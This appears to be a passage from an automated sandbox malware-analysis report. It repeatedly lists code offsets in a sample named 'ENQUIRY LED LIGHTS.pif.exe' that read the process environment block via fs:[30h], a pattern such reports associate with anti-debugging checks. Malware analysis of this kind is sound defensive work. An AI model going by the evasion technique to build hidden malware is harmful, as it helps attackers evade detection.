            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E609 mov eax, dword ptr fs:[00000030h]3_2_02F8E609
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F147FB mov eax, dword ptr fs:[00000030h]3_2_02F147FB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F147FB mov eax, dword ptr fs:[00000030h]3_2_02F147FB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9E7E1 mov eax, dword ptr fs:[00000030h]3_2_02F9E7E1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F327ED mov eax, dword ptr fs:[00000030h]3_2_02F327ED
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F327ED mov eax, dword ptr fs:[00000030h]3_2_02F327ED
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F327ED mov eax, dword ptr fs:[00000030h]3_2_02F327ED
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1C7C0 mov eax, dword ptr fs:[00000030h]3_2_02F1C7C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F907C3 mov eax, dword ptr fs:[00000030h]3_2_02F907C3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC47A0 mov eax, dword ptr fs:[00000030h]3_2_02FC47A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F107AF mov eax, dword ptr fs:[00000030h]3_2_02F107AF
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB678E mov eax, dword ptr fs:[00000030h]3_2_02FB678E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18770 mov eax, dword ptr fs:[00000030h]3_2_02F18770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10750 mov eax, dword ptr fs:[00000030h]3_2_02F10750
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9E75D mov eax, dword ptr fs:[00000030h]3_2_02F9E75D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52750 mov eax, dword ptr fs:[00000030h]3_2_02F52750
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52750 mov eax, dword ptr fs:[00000030h]3_2_02F52750
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F94755 mov eax, dword ptr fs:[00000030h]3_2_02F94755
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4674D mov esi, dword ptr fs:[00000030h]3_2_02F4674D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4674D mov eax, dword ptr fs:[00000030h]3_2_02F4674D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4674D mov eax, dword ptr fs:[00000030h]3_2_02F4674D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4273C mov eax, dword ptr fs:[00000030h]3_2_02F4273C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4273C mov ecx, dword ptr fs:[00000030h]3_2_02F4273C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4273C mov eax, dword ptr fs:[00000030h]3_2_02F4273C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8C730 mov eax, dword ptr fs:[00000030h]3_2_02F8C730
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C720 mov eax, dword ptr fs:[00000030h]3_2_02F4C720
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C720 mov eax, dword ptr fs:[00000030h]3_2_02F4C720
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10710 mov eax, dword ptr fs:[00000030h]3_2_02F10710
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F40710 mov eax, dword ptr fs:[00000030h]3_2_02F40710
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C700 mov eax, dword ptr fs:[00000030h]3_2_02F4C700
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F104E5 mov ecx, dword ptr fs:[00000030h]3_2_02F104E5
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F444B0 mov ecx, dword ptr fs:[00000030h]3_2_02F444B0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9A4B0 mov eax, dword ptr fs:[00000030h]3_2_02F9A4B0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F164AB mov eax, dword ptr fs:[00000030h]3_2_02F164AB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCA49A mov eax, dword ptr fs:[00000030h]3_2_02FCA49A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3A470 mov eax, dword ptr fs:[00000030h]3_2_02F3A470
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3A470 mov eax, dword ptr fs:[00000030h]3_2_02F3A470
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3A470 mov eax, dword ptr fs:[00000030h]3_2_02F3A470
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9C460 mov ecx, dword ptr fs:[00000030h]3_2_02F9C460
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3245A mov eax, dword ptr fs:[00000030h]3_2_02F3245A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCA456 mov eax, dword ptr fs:[00000030h]3_2_02FCA456
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0645D mov eax, dword ptr fs:[00000030h]3_2_02F0645D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0E420 mov eax, dword ptr fs:[00000030h]3_2_02F0E420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0E420 mov eax, dword ptr fs:[00000030h]3_2_02F0E420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0E420 mov eax, dword ptr fs:[00000030h]3_2_02F0E420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0C427 mov eax, dword ptr fs:[00000030h]3_2_02F0C427
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F48402 mov eax, dword ptr fs:[00000030h]3_2_02F48402
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F48402 mov eax, dword ptr fs:[00000030h]3_2_02F48402
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F48402 mov eax, dword ptr fs:[00000030h]3_2_02F48402
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F125E0 mov eax, dword ptr fs:[00000030h]3_2_02F125E0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C5ED mov eax, dword ptr fs:[00000030h]3_2_02F4C5ED
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C5ED mov eax, dword ptr fs:[00000030h]3_2_02F4C5ED
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F165D0 mov eax, dword ptr fs:[00000030h]3_2_02F165D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A5D0 mov eax, dword ptr fs:[00000030h]3_2_02F4A5D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A5D0 mov eax, dword ptr fs:[00000030h]3_2_02F4A5D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E5CF mov eax, dword ptr fs:[00000030h]3_2_02F4E5CF
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E5CF mov eax, dword ptr fs:[00000030h]3_2_02F4E5CF
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F345B1 mov eax, dword ptr fs:[00000030h]3_2_02F345B1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F345B1 mov eax, dword ptr fs:[00000030h]3_2_02F345B1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F905A7 mov eax, dword ptr fs:[00000030h]3_2_02F905A7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F905A7 mov eax, dword ptr fs:[00000030h]3_2_02F905A7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F905A7 mov eax, dword ptr fs:[00000030h]3_2_02F905A7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E59C mov eax, dword ptr fs:[00000030h]3_2_02F4E59C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F12582 mov eax, dword ptr fs:[00000030h]3_2_02F12582
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F12582 mov ecx, dword ptr fs:[00000030h]3_2_02F12582
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F44588 mov eax, dword ptr fs:[00000030h]3_2_02F44588
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4656A mov eax, dword ptr fs:[00000030h]3_2_02F4656A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4656A mov eax, dword ptr fs:[00000030h]3_2_02F4656A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4656A mov eax, dword ptr fs:[00000030h]3_2_02F4656A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18550 mov eax, dword ptr fs:[00000030h]3_2_02F18550
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18550 mov eax, dword ptr fs:[00000030h]3_2_02F18550
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20535 mov eax, dword ptr fs:[00000030h]3_2_02F20535
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20535 mov eax, dword ptr fs:[00000030h]3_2_02F20535
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20535 mov eax, dword ptr fs:[00000030h]3_2_02F20535
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20535 mov eax, dword ptr fs:[00000030h]3_2_02F20535
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20535 mov eax, dword ptr fs:[00000030h]3_2_02F20535
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20535 mov eax, dword ptr fs:[00000030h]3_2_02F20535
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E53E mov eax, dword ptr fs:[00000030h]3_2_02F3E53E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E53E mov eax, dword ptr fs:[00000030h]3_2_02F3E53E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E53E mov eax, dword ptr fs:[00000030h]3_2_02F3E53E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E53E mov eax, dword ptr fs:[00000030h]3_2_02F3E53E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E53E mov eax, dword ptr fs:[00000030h]3_2_02F3E53E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA6500 mov eax, dword ptr fs:[00000030h]3_2_02FA6500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4AAEE mov eax, dword ptr fs:[00000030h]3_2_02F4AAEE
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4AAEE mov eax, dword ptr fs:[00000030h]3_2_02F4AAEE
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10AD0 mov eax, dword ptr fs:[00000030h]3_2_02F10AD0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F44AD0 mov eax, dword ptr fs:[00000030h]3_2_02F44AD0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F44AD0 mov eax, dword ptr fs:[00000030h]3_2_02F44AD0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F66ACC mov eax, dword ptr fs:[00000030h]3_2_02F66ACC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F66ACC mov eax, dword ptr fs:[00000030h]3_2_02F66ACC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F66ACC mov eax, dword ptr fs:[00000030h]3_2_02F66ACC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18AA0 mov eax, dword ptr fs:[00000030h]3_2_02F18AA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18AA0 mov eax, dword ptr fs:[00000030h]3_2_02F18AA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F66AA4 mov eax, dword ptr fs:[00000030h]3_2_02F66AA4
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F48A90 mov edx, dword ptr fs:[00000030h]3_2_02F48A90
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4A80 mov eax, dword ptr fs:[00000030h]3_2_02FE4A80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8CA72 mov eax, dword ptr fs:[00000030h]3_2_02F8CA72
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8CA72 mov eax, dword ptr fs:[00000030h]3_2_02F8CA72
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4CA6F mov eax, dword ptr fs:[00000030h]3_2_02F4CA6F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4CA6F mov eax, dword ptr fs:[00000030h]3_2_02F4CA6F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4CA6F mov eax, dword ptr fs:[00000030h]3_2_02F4CA6F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBEA60 mov eax, dword ptr fs:[00000030h]3_2_02FBEA60
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20A5B mov eax, dword ptr fs:[00000030h]3_2_02F20A5B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20A5B mov eax, dword ptr fs:[00000030h]3_2_02F20A5B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F34A35 mov eax, dword ptr fs:[00000030h]3_2_02F34A35
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F34A35 mov eax, dword ptr fs:[00000030h]3_2_02F34A35
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4CA24 mov eax, dword ptr fs:[00000030h]3_2_02F4CA24
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3EA2E mov eax, dword ptr fs:[00000030h]3_2_02F3EA2E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9CA11 mov eax, dword ptr fs:[00000030h]3_2_02F9CA11
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18BF0 mov eax, dword ptr fs:[00000030h]3_2_02F18BF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18BF0 mov eax, dword ptr fs:[00000030h]3_2_02F18BF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18BF0 mov eax, dword ptr fs:[00000030h]3_2_02F18BF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9CBF0 mov eax, dword ptr fs:[00000030h]3_2_02F9CBF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3EBFC mov eax, dword ptr fs:[00000030h]3_2_02F3EBFC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBEBD0 mov eax, dword ptr fs:[00000030h]3_2_02FBEBD0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F30BCB mov eax, dword ptr fs:[00000030h]3_2_02F30BCB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F30BCB mov eax, dword ptr fs:[00000030h]3_2_02F30BCB
